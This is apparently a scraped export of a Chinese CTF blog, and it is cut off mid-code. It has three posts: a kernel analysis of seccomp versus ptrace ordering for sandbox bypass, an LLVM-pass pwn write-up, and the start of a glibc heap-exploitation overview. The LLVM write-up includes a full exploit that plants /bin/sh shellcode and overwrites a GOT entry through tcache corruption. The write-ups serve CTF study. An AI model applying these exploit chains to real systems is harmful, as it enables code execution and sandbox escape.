12case PR_SET_SECCOMP: error = prctl_set_seccomp(arg2, (char __user *)arg3); 这里涉及到这样一条调用链 12345-->prctl -->prctl_set_seccomp -->do_seccomp -->seccomp_set_mode_filter --> seccomp_attach_filter seccomp_attach_filter 核心代码如下: 1234filter->prev = current->seccomp.filter;seccomp_cache_prepare(filter);current->seccomp.filter = filter;atomic_inc(&current->seccomp.filter_count); current是一个全局的指针,指向当前进程的task结构体,主要保存了当前进程的一些信息。 所以,当我们注册seccomp,实际上就是设置了当前进程的filter规则。而什么时候根据这个规则进行过滤呢? 笔者将在syscall的分析中给出答案。 ptrace ptrace是用来跟踪进程的一个系统调用 当使用ptrace进行 PTRACE_SYSCALL 也就是一般我们劫持系统调用的操作时: ptrace的调用链如下 12345-->PTRACE_SYSCALL -->arch_ptrace -->ptrace_request --> ptrace_resume -->set_task_syscall_work 可以看到最终调用了set_task_syscall_work 宏 12#define set_task_syscall_work(t, fl) \\ set_bit(SYSCALL_WORK_BIT_##fl, &task_thread_info(t)->syscall_work) 这个宏通过task_thread_info获取了监视的进程的记录结构地址(当被监视进程运行时,此时current指针也指向这个结构,但是此时是监视程序运行时,所以通过task_thread_info取得其地址) 在获取结构体地址后设置了 SYSCALL_WORK_BIT , 一个标志位, 也就是说,实际上ptrace:PTRACE_SYSCALL 和 prctl: PR_SET_SECCOMP 都只是在进程info上添加了一些信息,最终真正的处理要等到syscall中。 syscall syscall 是如何处理 seccomp 以及ptrace 的呢? 其经过了如下调用链 12345-->entry_SYSCALL_64 -->do_syscall_64 -->syscall_enter_from_user_mode -->__syscall_enter_from_user_work -->syscall_trace_enter syscall_trace_enter代码如下 12345678910111213141516171819202122232425262728293031323334353637383940static long syscall_trace_enter(struct pt_regs *regs, long syscall, unsigned long work){ long ret = 0; /* * Handle Syscall User Dispatch. This must comes first, since * the ABI here can be something that doesn't make sense for * other syscall_work features. */ if (work & SYSCALL_WORK_SYSCALL_USER_DISPATCH) { if (syscall_user_dispatch(regs)) return -1L; } /* Handle ptrace */ if (work & (SYSCALL_WORK_SYSCALL_TRACE | SYSCALL_WORK_SYSCALL_EMU)) { ret = ptrace_report_syscall_entry(regs); if (ret || (work & SYSCALL_WORK_SYSCALL_EMU)) return -1L; } /* Do seccomp after ptrace, to catch any tracer changes. */ if (work & SYSCALL_WORK_SECCOMP) { ret = __secure_computing(NULL); if (ret == -1L) return ret; } /* Either of the above might have changed the syscall number */ syscall = syscall_get_nr(current, regs); if (unlikely(work & SYSCALL_WORK_SYSCALL_TRACEPOINT)) trace_sys_enter(regs, syscall); syscall_enter_audit(regs, syscall); return ret ? 
: syscall;} 其中work由 READ_ONCE(current_thread_info()->syscall_work) 得到 12345678910static __always_inline long__syscall_enter_from_user_work(struct pt_regs *regs, long syscall){ unsigned long work = READ_ONCE(current_thread_info()->syscall_work); if (work & SYSCALL_WORK_ENTER) syscall = syscall_trace_enter(regs, syscall, work); return syscall;} 由前面的分析我们可以知道, ptrace最终就是设置了SYSCALL_WORK_BIT 也因此,这里的检测和处理,如注释所说的,就是处理我们在前面看到的seccomp和ptrace。 再看 PTRACE_SYSCALL 的实际处理函数 ptrace_report_syscall。 其中发送了SYSTRAP信号, 会让当前进程阻塞。等待ptrace的处理。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950/* * ptrace report for syscall entry and exit looks identical. */static inline int ptrace_report_syscall(unsigned long message){ int ptrace = current->ptrace; int signr; if (!(ptrace & PT_PTRACED)) return 0; signr = ptrace_notify(SIGTRAP | ((ptrace & PT_TRACESYSGOOD) ? 0x80 : 0), message); /* * this isn't the same as continuing with a signal, but it will do * for normal use. strace only continues with a signal if the * stopping signal is not SIGTRAP. -brl */ if (signr) send_sig(signr, current, 1); return fatal_signal_pending(current);}/** * ptrace_report_syscall_entry - task is about to attempt a system call * @regs: user register state of current task * * This will be called if %SYSCALL_WORK_SYSCALL_TRACE or * %SYSCALL_WORK_SYSCALL_EMU have been set, when the current task has just * entered the kernel for a system call. Full user register state is * available here. Changing the values in @regs can affect the system * call number and arguments to be tried. It is safe to block here, * preventing the system call from beginning. * * Returns zero normally, or nonzero if the calling arch code should abort * the system call. That must prevent normal entry so no system call is * made. If @task ever returns to user mode after this, its register state * is unspecified, but should be something harmless like an %ENOSYS error * return. It should preserve enough information so that syscall_rollback() * can work (see asm-generic/syscall.h). * * Called without locks, just after entering kernel mode. */static inline __must_check int ptrace_report_syscall_entry( struct pt_regs *regs){ return ptrace_report_syscall(PTRACE_EVENTMSG_SYSCALL_ENTRY);} 正如注释所说,通过ptrace拦截系统调用后,对于寄存器的修改,都是在这个时间发生的。 This will be called if %SYSCALL_WORK_SYSCALL_TRACE or %SYSCALL_WORK_SYSCALL_EMU have been set, when the current task has just entered the kernel for a system call. Full user register state is available here. Changing the values in @regs can affect the system call number and arguments to be tried. It is safe to block here, preventing the system call from beginning.> 而这一处理,在seccomp前面,所以即使通过ptrace拦截系统调用修改系统调用号后,seccomp还是会进行检查。 那为什么网上会有相关WP呢? 以下为linux-4.7的代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126/* * We can return 0 to resume the syscall or anything else to go to phase * 2. If we resume the syscall, we need to put something appropriate in * regs->orig_ax. * * NB: We don't have full pt_regs here, but regs->orig_ax and regs->ax * are fully functional. 
* * For phase 2's benefit, our return value is: * 0: resume the syscall * 1: go to phase 2; no seccomp phase 2 needed * anything else: go to phase 2; pass return value to seccomp */unsigned long syscall_trace_enter_phase1(struct pt_regs *regs, u32 arch){ struct thread_info *ti = pt_regs_to_thread_info(regs); unsigned long ret = 0; u32 work; if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current)); work = ACCESS_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY;#ifdef CONFIG_SECCOMP /* * Do seccomp first -- it should minimize exposure of other * code, and keeping seccomp fast is probably more valuable * than the rest of this. */ if (work & _TIF_SECCOMP) { struct seccomp_data sd; sd.arch = arch; sd.nr = regs->orig_ax; sd.instruction_pointer = regs->ip;#ifdef CONFIG_X86_64 if (arch == AUDIT_ARCH_X86_64) { sd.args[0] = regs->di; sd.args[1] = regs->si; sd.args[2] = regs->dx; sd.args[3] = regs->r10; sd.args[4] = regs->r8; sd.args[5] = regs->r9; } else#endif { sd.args[0] = regs->bx; sd.args[1] = regs->cx; sd.args[2] = regs->dx; sd.args[3] = regs->si; sd.args[4] = regs->di; sd.args[5] = regs->bp; } BUILD_BUG_ON(SECCOMP_PHASE1_OK != 0); BUILD_BUG_ON(SECCOMP_PHASE1_SKIP != 1); ret = seccomp_phase1(&sd); if (ret == SECCOMP_PHASE1_SKIP) { regs->orig_ax = -1; ret = 0; } else if (ret != SECCOMP_PHASE1_OK) { return ret; /* Go directly to phase 2 */ } work &= ~_TIF_SECCOMP; }#endif /* Do our best to finish without phase 2. */ if (work == 0) return ret; /* seccomp and/or nohz only (ret == 0 here) */#ifdef CONFIG_AUDITSYSCALL if (work == _TIF_SYSCALL_AUDIT) { /* * If there is no more work to be done except auditing, * then audit in phase 1. Phase 2 always audits, so, if * we audit here, then we can't go on to phase 2. */ do_audit_syscall_entry(regs, arch); return 0; }#endif return 1; /* Something is enabled that we can't handle in phase 1 */}/* Returns the syscall nr to run (which should match regs->orig_ax). */long syscall_trace_enter_phase2(struct pt_regs *regs, u32 arch, unsigned long phase1_result){ struct thread_info *ti = pt_regs_to_thread_info(regs); long ret = 0; u32 work = ACCESS_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY; if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current));#ifdef CONFIG_SECCOMP /* * Call seccomp_phase2 before running the other hooks so that * they can see any changes made by a seccomp tracer. */ if (phase1_result > 1 && seccomp_phase2(phase1_result)) { /* seccomp failures shouldn't expose any additional code. 
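 * (笔者注: 被 seccomp 拒绝的调用在这里直接 return -1, 不会走到后面的
 * tracehook_report_syscall_entry —— 和前面 6.6 版 syscall_trace_enter 的顺序正好相反)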
*/ return -1; }#endif if (unlikely(work & _TIF_SYSCALL_EMU)) ret = -1L; if ((ret || test_thread_flag(TIF_SYSCALL_TRACE)) && tracehook_report_syscall_entry(regs)) ret = -1L; if (unlikely(test_thread_flag(TIF_SYSCALL_TRACEPOINT))) trace_sys_enter(regs, regs->orig_ax); do_audit_syscall_entry(regs, arch); return ret ?: regs->orig_ax;} 对seccomp 的处理在 syscall_trace_enter_phase1, 而处理ptrace的tracehook_report_syscall_entry 在syscall_trace_enter_phase2 seccomp的过滤在ptrace之前。 所以,在4.8以下,这种攻击是可以实现的。 Tricks 那么ptrace在绕过沙箱时是不是完全没有用了呢,也不是。 在和@cnitlrt 师傅交流后,得知了一个很骚操作的办法。 使用nc 连接两次,产生了两个进程,如果能在第二个进程运行前,通过ptrace截停prctl的调用,改成随便一个无关调用,就可以实现沙盒的绕过 这里存在三个问题: 首先是如何获得第二个进程的pid: 在CTF这种比较纯净的环境,可以认为两个进程PID相近,把当前进程的PID加1或者加2就可以。 其次是如何实现在第二次进程运行seccomp前的窗口期实现ptrace上此进程: 可以通过在一个进程使用ptrace attach轮询,直到执行成功返回1。不过也有失败的概率。 第三也是最终限制了这个tricks的使用的是,我们都知道,ptrace默认只能attach到自己的子进程,除非 /proc/sys/kernel/yama/ptrace_scope 设置为0, 在个人用户使用时,为了方便gdb等调试器,这个选项一般是0, 然而,当我随便开了个ubuntu的docker看了一下后: 12$ cat proc/sys/kernel/yama/ptrace_scope 1 啊这,这,那没事了","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"}]},{"title":"Pwn.I wanna be a llvm passer","slug":"Pwn.I-Wanna-be-A-LLVM-Passer","date":"2023-06-22T16:00:00.000Z","updated":"2024-01-26T14:38:52.763Z","comments":true,"path":"Pwn.I-Wanna-be-A-LLVM-Passer/","link":"","permalink":"https://v3rdant.cn/Pwn.I-Wanna-be-A-LLVM-Passer/","excerpt":"overview 华中赛遇到了一个llvm的题,顺手系统总结一下llvm pass吧。 首先简单介绍一下llvm,llvm是一套用C++编写的编译器基础设施。LLVM Pass提供了一些可供重写的函数,本义是用来实现一些优化。而Pwn的llvm pass类题,就是重写了runOnFunction函数。","text":"overview 华中赛遇到了一个llvm的题,顺手系统总结一下llvm pass吧。 首先简单介绍一下llvm,llvm是一套用C++编写的编译器基础设施。LLVM Pass提供了一些可供重写的函数,本义是用来实现一些优化。而Pwn的llvm pass类题,就是重写了runOnFunction函数。 ll和bc是llvm生成的IR的两种形式,分别是适合人类阅读的文本形式和二进制形式,可以用如下命令转换。 12345.c -> .ll:clang -emit-llvm -S a.c -o a.ll.c -> .bc: clang -emit-llvm -c a.c -o a.bc.ll -> .bc: llvm-as a.ll -o a.bc.bc -> .ll: llvm-dis a.bc -o a.ll.bc -> .s: llc a.bc -o a.s 由于笔者实机为Fedora, 所以笔者使用ubuntu docker 来安装llvm和clang,在需要调试时,将相应共享库导入到本地,用patchelf来更改软链接,还是在docker中配置调试环境比较方便.jpg 启动一个ubuntu:20.04的container,如下安装并配置好调试环境即可 12345678sudo apt install clang-8sudo apt install llvm-8 sudo apt install clang-10sudo apt install llvm-10 sudo apt install clang-12sudo apt install llvm-12 opt就是所要pwn掉的对象,他是llvm的优化器,可以加载指定pass模块和exp对应ll代码,由于opt一般无PIE保护,所以一般通过覆盖got表来实现劫持控制流。自己安装的opt路径为/usr/lib/llvm-xx/bin/opt so分析 如何定位重写的 runOnFunction 函数呢? 首先定位到.data.rel.ro 段的vtable,其最后一项就是此函数。 另一种定位方法: 首先找到注册的Pass的字符串。 这里IDA没有自动识别,将Hello字符串更改类型并命名 然后通过交叉引用找到Pass注册函数 跟进sub_7e10 跟进sub_7F90 继续跟进 此处unk_FD48即为虚表地址。 函数对照 getName():获取当前处理的函数名 getOpcodeName():获取操作符名称 getOpcodeName()函数用于获取指令的操作符的名称 getNumOperands()用于获取指令的操作数的个数 getOpcode()函数用于获取指令的操作符编号,在/usr/include/llvm-xx/llvm/IR/Instruction.def可以找到编号和操作符的对应表 getOperand(i)是用于获取第i个操作数(在这里就是获取所调用函数的第i个参数),getArgOperand()函数与其用法类似,但只能获取参数,getZExtValue()即get Zero Extended Value,也就是将获取的操作数转为无符号扩展整数。 调试 调试实际上是调试opt,所以采用如下方法调试即可: 1gdb ./opt 先用gdb调试opt 12set args -load ./<pass so name>.so -<pass name> exp.llstart 再设置参数加载pass 1n <一系列call指令数> 在开始的200左右个call指令后,pass.so才会加载进内存 1b *<pass加载地址>+<偏移> 注意事项 heap 由于opt是一个较为复杂的软件,运行过程中,存在相当多的无关chunk的分配,而且,由于exp.ll会被加载进入内存,即使exp变动的很小,chunk布局也可能会发生改变,因此需要小心注意chunk之间的偏移,可以考虑预先多分配一些chunk填充,方便之后更改偏移。 got 如何选择覆写的got表? 
首先通过调用链确定runOnFunction 的调用位置。 然后通过finish 返回到main后,查找后面使用到的got表即可 example 2023-ciscn-huazhong-lvm 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266__int64 __fastcall sub_8050(__int64 a1, llvm::Function *a2){ __int64 v2; // rdx llvm::BasicBlock *v3; // rax llvm::BasicBlock *v4; // rax llvm::Instruction *v5; // rax llvm::Value *CalledFunction; // rax __int64 v7; // rdx __int64 ArgOperand; // rax llvm::ConstantInt *v9; // rax __int64 v10; // rax __int64 v11; // rax llvm::User *v12; // rax __int64 v13; // rax llvm::ConstantInt *v14; // rax llvm::User *v15; // rax __int64 v16; // rax llvm::ConstantInt *v17; // rax __int64 v18; // rax llvm::ConstantInt *v19; // rax __int64 v20; // rax llvm::ConstantInt *v21; // rax llvm::User *v22; // rax __int64 v23; // rax llvm::ConstantInt *v24; // rax __int64 v25; // rax llvm::ConstantInt *v26; // rax char v28; // [rsp+Eh] [rbp-182h] char v29; // [rsp+Fh] [rbp-181h] int v30; // [rsp+10h] [rbp-180h] int v31; // [rsp+14h] [rbp-17Ch] __int64 v32; // [rsp+18h] [rbp-178h] BYREF __int64 v33; // [rsp+20h] [rbp-170h] BYREF __int64 v34[2]; // [rsp+28h] [rbp-168h] BYREF __int64 v35; // [rsp+38h] [rbp-158h] __int64 v36; // [rsp+40h] [rbp-150h] __int64 v37[2]; // [rsp+48h] [rbp-148h] BYREF __int64 v38; // [rsp+58h] [rbp-138h] __int64 v39; // [rsp+60h] [rbp-130h] int v40; // [rsp+6Ch] [rbp-124h] int v41; // [rsp+70h] [rbp-120h] int v42; // [rsp+74h] [rbp-11Ch] __int64 v43; // [rsp+78h] [rbp-118h] BYREF __int64 v44; // [rsp+80h] [rbp-110h] BYREF __int64 v45; // [rsp+88h] [rbp-108h] BYREF __int64 v46[2]; // [rsp+90h] [rbp-100h] BYREF __int64 v47; // [rsp+A0h] [rbp-F0h] __int64 v48; // [rsp+A8h] [rbp-E8h] int v49; // [rsp+B4h] [rbp-DCh] __int64 v50; // [rsp+B8h] [rbp-D8h] BYREF _QWORD v51[2]; // [rsp+C0h] [rbp-D0h] BYREF __int64 v52; // [rsp+D0h] [rbp-C0h] __int64 v53; // [rsp+D8h] [rbp-B8h] int i; // [rsp+E4h] [rbp-ACh] void *v55; // [rsp+E8h] [rbp-A8h] int ZExtValue; // [rsp+F4h] [rbp-9Ch] __int64 Operand; // [rsp+F8h] [rbp-98h] BYREF _QWORD v58[2]; // [rsp+100h] [rbp-90h] BYREF __int64 v59; // [rsp+110h] [rbp-80h] __int64 v60; // [rsp+118h] [rbp-78h] __int64 Name; // [rsp+120h] [rbp-70h] __int64 v62; // [rsp+128h] [rbp-68h] llvm::CallBase *v63; // [rsp+130h] [rbp-60h] __int64 v64; // [rsp+138h] [rbp-58h] BYREF __int64 v65; // [rsp+140h] [rbp-50h] BYREF __int64 v66; // [rsp+148h] [rbp-48h] BYREF __int64 v67; // [rsp+150h] [rbp-40h] BYREF __int64 v68; // [rsp+158h] [rbp-38h] BYREF _QWORD v69[3]; // [rsp+160h] [rbp-30h] BYREF llvm::Function *v70; // [rsp+178h] [rbp-18h] __int64 v71; // [rsp+180h] [rbp-10h] char v72; // [rsp+18Fh] [rbp-1h] v71 = a1; v70 = a2; v69[1] = llvm::Value::getName(a2); v69[2] = v2; v68 = llvm::Function::end(a2); llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,true>::ilist_iterator<false>( v69, &v68, 0LL); v66 = llvm::Function::begin(v70); 
llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,true>::ilist_iterator<false>( &v67, &v66, 0LL); while ( (llvm::operator!=(&v67, v69) & 1) != 0 ) { v3 = (llvm::BasicBlock *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,true>::operator->(&v67); v65 = llvm::BasicBlock::begin(v3); v4 = (llvm::BasicBlock *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,true>::operator->(&v67); v64 = llvm::BasicBlock::end(v4); while ( (llvm::operator!=(&v65, &v64) & 1) != 0 ) { v5 = (llvm::Instruction *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>::operator->(&v65); if ( (unsigned int)llvm::Instruction::getOpcode(v5) == 56 ) { v63 = (llvm::CallBase *)llvm::dyn_cast<llvm::CallInst,llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>>(&v65); CalledFunction = (llvm::Value *)llvm::CallBase::getCalledFunction(v63); Name = llvm::Value::getName(CalledFunction); v62 = v7; v59 = Name; v60 = v7; llvm::StringRef::StringRef((std::_Function_base *)v58, "Add"); if ( (llvm::operator==(v59, v60, v58[0], v58[1]) & 1) != 0 ) { Operand = llvm::CallBase::getOperand(v63, 0); if ( (llvm::isa<llvm::ConstantInt,llvm::Value *>(&Operand) & 1) == 0 ) { v10 = llvm::errs((llvm *)&Operand); v11 = llvm::raw_ostream::operator<<(v10, "Error argument"); llvm::raw_ostream::operator<<(v11, "\\n"); v72 = 0; return v72 & 1; } ArgOperand = llvm::CallBase::getArgOperand(v63, 0); v9 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(ArgOperand); ZExtValue = llvm::ConstantInt::getZExtValue(v9); v55 = 0LL; v55 = malloc(ZExtValue); if ( !v55 ) { perror("malloc"); v72 = 0; return v72 & 1; } for ( i = 0; i < 32; ++i ) { if ( !*((_QWORD *)&addrList + i) ) { *((_QWORD *)&addrList + i) = v55; break; } } } else { v52 = Name; v53 = v62; llvm::StringRef::StringRef((std::_Function_base *)v51, "Del"); if ( (llvm::operator==(v52, v53, v51[0], v51[1]) & 1) != 0 ) { v12 = (llvm::User *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>::operator->(&v65); if ( (unsigned int)llvm::User::getNumOperands(v12) != 2 ) { printf("ERROR argument size"); v72 = 0; return v72 & 1; } v50 = llvm::CallBase::getOperand(v63, 0); if ( (llvm::isa<llvm::ConstantInt,llvm::Value *>(&v50) & 1) != 0 ) { v13 = llvm::CallBase::getArgOperand(v63, 0); v14 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13); v49 = llvm::ConstantInt::getZExtValue(v14); if ( !*((_QWORD *)&addrList + v49) || v49 >= 32 ) { v72 = 0; return v72 & 1; } free(*((void **)&addrList + v49)); *((_QWORD *)&addrList + v49) = 0LL; } } else { v47 = Name; v48 = v62; llvm::StringRef::StringRef((std::_Function_base *)v46, "Edit"); if ( (llvm::operator==(v47, v48, v46[0], v46[1]) & 1) != 0 ) { v15 = (llvm::User *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>::operator->(&v65); if ( (unsigned int)llvm::User::getNumOperands(v15) != 4 ) goto LABEL_28; v45 = llvm::CallBase::getOperand(v63, 0); v29 = 0; if ( (llvm::isa<llvm::ConstantInt,llvm::Value *>(&v45) & 1) != 0 ) { v44 = llvm::CallBase::getOperand(v63, 1u); v29 = 0; if ( (llvm::isa<llvm::ConstantInt,llvm::Value *>(&v44) & 1) != 0 ) { v43 = llvm::CallBase::getOperand(v63, 2u); v29 = llvm::isa<llvm::ConstantInt,llvm::Value *>(&v43); } } if ( (v29 & 1) != 0 ) { v16 = 
llvm::CallBase::getArgOperand(v63, 0); v17 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v16); v42 = llvm::ConstantInt::getZExtValue(v17); v18 = llvm::CallBase::getArgOperand(v63, 1u); v19 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v18); v41 = llvm::ConstantInt::getZExtValue(v19); v20 = llvm::CallBase::getArgOperand(v63, 2u); v21 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v20); v40 = llvm::ConstantInt::getZExtValue(v21); if ( !*((_QWORD *)&addrList + v42) || v42 >= 32 ) { v72 = 0; return v72 & 1; } *(_DWORD *)(*((_QWORD *)&addrList + v42) + 4LL * v41) = v40; } } else { v38 = Name; v39 = v62; llvm::StringRef::StringRef((std::_Function_base *)v37, "Alloc"); if ( (llvm::operator==(v38, v39, v37[0], v37[1]) & 1) != 0 ) { mmap(&off_10000, 0x1000uLL, 7, 33, 0, 0LL); } else { v35 = Name; v36 = v62; llvm::StringRef::StringRef((std::_Function_base *)v34, "EditAlloc"); if ( (llvm::operator==(v35, v36, v34[0], v34[1]) & 1) != 0 ) { v22 = (llvm::User *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>::operator->(&v65); if ( (unsigned int)llvm::User::getNumOperands(v22) != 3 ) {LABEL_28: printf("Error argument size"); v72 = 0; return v72 & 1; } v33 = llvm::CallBase::getOperand(v63, 0); v28 = 0; if ( (llvm::isa<llvm::ConstantInt,llvm::Value *>(&v33) & 1) != 0 ) { v32 = llvm::CallBase::getOperand(v63, 1u); v28 = llvm::isa<llvm::ConstantInt,llvm::Value *>(&v32); } if ( (v28 & 1) != 0 ) { v23 = llvm::CallBase::getArgOperand(v63, 0); v24 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v23); v31 = llvm::ConstantInt::getZExtValue(v24); v25 = llvm::CallBase::getArgOperand(v63, 1u); v26 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25); v30 = llvm::ConstantInt::getZExtValue(v26); if ( !*((_QWORD *)&addrList + v31) || v31 >= 32 || v30 >= 256 ) { v72 = 0; return v72 & 1; } *(_DWORD *)(v30 + 0x10000) = **((_DWORD **)&addrList + v31); } } } } } } } llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,true>::operator++(&v65); } llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,true>::operator++(&v67); } v72 = 0; return v72 & 1;} 实现了一个类似菜单堆的面板,通过Alloc可以分配一块位于0x10000的可执行区域,在此写入shellcode,Edit存在溢出,可以使用负偏移从而改写tcache管理结构体,这里考虑将0x40的链表改写成oprator delete(void*) 的got表的位置,并且将其剩余数量改写为1,以防止继续分配coredump,之后覆写got表为0x10000。 exp: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354#include <stdio.h>void Add(int size);// Add any sizevoid Del(int idx);// Delvoid Edit(int idx, int offset, unsigned int num);// Allocvoid Alloc(void);void EditAlloc(int num, int offset);// write got/*"\\x48\\x31\\xf6\\x560x56f63148\\x48\\xbf\\x2f\\x620x622fbf48\\x69\\x6e\\x2f\\x2f0x2f2f6e69\\x73\\x68\\x57\\x54"0x54576873"\\x5f\\xb0\\x3b\\x990x993bb05f\\x0f\\x05"*/int main(){ Add(0); // 0 Edit(0, 0, 0x56f63148); Add(0); // 1 Edit(1, 0, 0x622fbf48); Add(0); // 2 Edit(2, 0, 0x2f2f6e69); Add(0); // 3 Edit(3, 0, 0x54576873); Add(0); // 4 Edit(4, 0, 0x993bb05f); Add(0); // 5 Edit(5, 0, 0x050f); Alloc(); EditAlloc(0, 0); EditAlloc(1, 4); EditAlloc(2, 4 * 2); EditAlloc(3, 4 * 3); EditAlloc(4, 4 * 4); EditAlloc(5, 4 * 5); // set tcache 0x40 num and link Edit(0, -0x25d6f, 1); Edit(0, -0x25d4c, (0x78B000)); // make opretor delete got to 0x10000 Add(0x30); // 6 Edit(6, 1, 0); Edit(6, 0, 0x10000); // 
Add(0);}","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"}]},{"title":"Pwn.Heap-Exploation-up-to-2.31","slug":"Pwn.Heap-Exploation-up-to-2.31","date":"2023-06-20T16:00:00.000Z","updated":"2024-03-04T07:37:44.361Z","comments":true,"path":"Pwn.Heap-Exploation-up-to-2.31/","link":"","permalink":"https://v3rdant.cn/Pwn.Heap-Exploation-up-to-2.31/","excerpt":"关于heap我所知道的一切","text":"关于heap我所知道的一切 Basic Knowledge bins: unsorted bin fast bin small bin large bin NO LIMITATION 0x20-0x80 <0x400 >0x400 libc version ubuntu-libc version 2.23=“16.04” 2.24=“17.04” 2.26=“17.10” 2.27=“18.04” 2.28=“18.10” 2.29=“19.04” 2.30=“19.10” 2.31=“20.04” 2.32=“20.10” 2.33=“21.04” 2.34=“22.04” Overview 在刚刚入门堆时,笔者是比较苦恼的,笔者在学习一项知识时,习惯性地想先从大局着手来学习。即,先对这个知识内容的整体有一定了解后,再去填充细节内容。然而在笔者开始学习堆利用时,被各种繁杂的版本差异和堆利用弄得头昏脑涨,因此对于堆一直不得其门而入,无法深刻理解多种多样的技巧及其使用时机,也因此不像栈溢出一样,笔者无法快速理出一个直观的脉络,然后安排细化的学习路径。 本文主要针对glibc2.30及以上有着tcache的版本。因为低于2.27版本的堆笔者根本不会 正如关于栈溢出的文章中,笔者根据攻击点将栈溢出分为三种,在这篇文章中,笔者也将拆解heap exploation,完成笔者心目中的一个划分。 在笔者看来,一次堆利用主要分为一下几个步骤: 漏洞的发现 地址的泄露 利用漏洞控制目标地址内容 攻击的对象 因此,本文的主要的编排顺序,也是按照这样几个顺序来实现的。笔者首先将会介绍堆利用过程中的一些基本漏洞,其次,笔者将会介绍如何完成地址泄露,接着,笔者将会讨论一些heap exploation的技术以及这些技术如何控制目标地址,而在可以控制一个目标地址后,最后笔者将讨论如何如何我们可以选取哪些攻击对象,以及他们各自有什么优劣。 笔者写这一篇文章时,去年这个时间差不多是我刚刚开始学习堆利用的时间,经过一年的时间,笔者总算感觉对于堆利用有了一个比较综合性的认知,尽管当前关于heap exploation的blog很多,但是笔者仍然感觉过于零散,因此,在这篇文章中,同笔者关于栈溢出的文章一样,笔者也不会过多的讲述各个技巧的细节–去看这些技巧的提出者大师傅可能讲述地要比我更完善–而着重于贯穿各个技巧的联系, 才不是因为笔者懒呢 ,目的是提供一个学习路径的图谱和完成一次堆利用时的思考路径。 基本漏洞 UAF 在free时没有清空指针,可以重利用指针。 在没有Edit 的情况下,可以通过 double free 进行堆块重叠。 overflow 溢出,可以控制下一个chunk,一般而言,可以方便地转换为堆块重叠,因此,也容易利用 off-by-one/off-by-null 这里主要针对2.29-2.31版本, 2.29-2.31版本的off-by-null ,wjh师傅已经讲解的非常详细了,核心就是通过unsorted bin机制残留的指针伪造fd、bk,来进行unlink,最后制造堆重叠。 漏洞的利用 上述几个漏洞都可以方便地转换为堆重叠,在此基础上,可以很方便地转换为任意地址写,在small bin的范围内,可以考虑tcache poison,在large bin的范围内,可以考虑large bin attack,在此基础上再对特定的攻击面进行攻击,即可劫持控制流 考虑: one gadget system(“/bin/sh”) orw leak 一般而言,堆题中的leak主要是针对libc地址,heap地址的leak相对而言较为简单,而libc地址的leak将在 [[#stack]] 攻击面部分详述。 一般而言,heap leak 堆地址主要利用unsorted bin的第一个chunk会存在libc地址来leak。如果存在UAF,可以将一个直接放入unsorted bin,然后show来获得。 也可以释放入unsorted bin 后再申请回来实现,由于malloc并不会清空chunk内容,因此可以读取到残留的libc的指针。 此外,当释放进入unsorted bin后,申请一个从unsorted bin 切分下的 chunk,此时chunk头也会留有相应指针。 而在没有show相关输出chunk内容的函数时,考虑通过_IO_2_1_stdout_ 来leak 基本原理就是partial overwrite 覆盖unsorted bin中的libc地址,分配到__IO_2_1_stdout的位置,然后改写来完成leak Basic tricks up to 2.30 在2.30以上的版本,我认为需要掌握的基本技术主要包括: [x] largebin attack [x] tcache stashing unlink attack [x] unsafe unlink [x] tcache poison [x] house of botcake [x] decrypt safe_unlink [x] house of pig [x] 堆布局 这里结合how to heap源代码分析 Largebin attack 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263#include <stdio.h>#include <stdlib.h>#include <string.h>#include <stdint.h>#include 